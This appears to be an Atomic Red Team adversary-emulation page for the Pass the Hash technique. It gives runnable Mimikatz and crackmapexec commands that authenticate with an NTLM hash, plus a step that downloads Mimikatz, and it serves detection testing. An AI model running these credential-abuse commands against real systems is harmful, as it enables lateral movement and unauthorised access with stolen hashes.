# T1550.002 - Pass the Hash

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)

## Atomic Tests

### Atomic Test #1 - Mimikatz Pass the Hash

Note: the hashes must be dumped first (see Reference).

**Supported Platforms:** Windows

**Inputs:**

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator |
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a |
| domain | domain | string | atomic.local |
| mimikatz_path | mimikatz windows executable | Path | %tmp%\mimikatz\x64\mimikatz.exe |

#### Attack Commands: Run with `command_prompt`!

```cmd
#{mimikatz_path} sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```

#### Dependencies: Run with `powershell`!

##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```

##### Get Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
```


### Atomic Test #2 - crackmapexec Pass the Hash

Execute a command on the target with crackmapexec, authenticating with the NTLM hash.

**Supported Platforms:** Windows

**Inputs:**

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator |
| crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe |
| command | command to execute | string | whoami |
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a |
| domain | domain | string | atomic.local |

#### Attack Commands: Run with `command_prompt`!

```cmd
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
```

#### Dependencies: Run with `powershell`!

##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})

##### Check Prereq Commands:
```powershell
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
```

##### Get Prereq Commands:
```powershell
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
```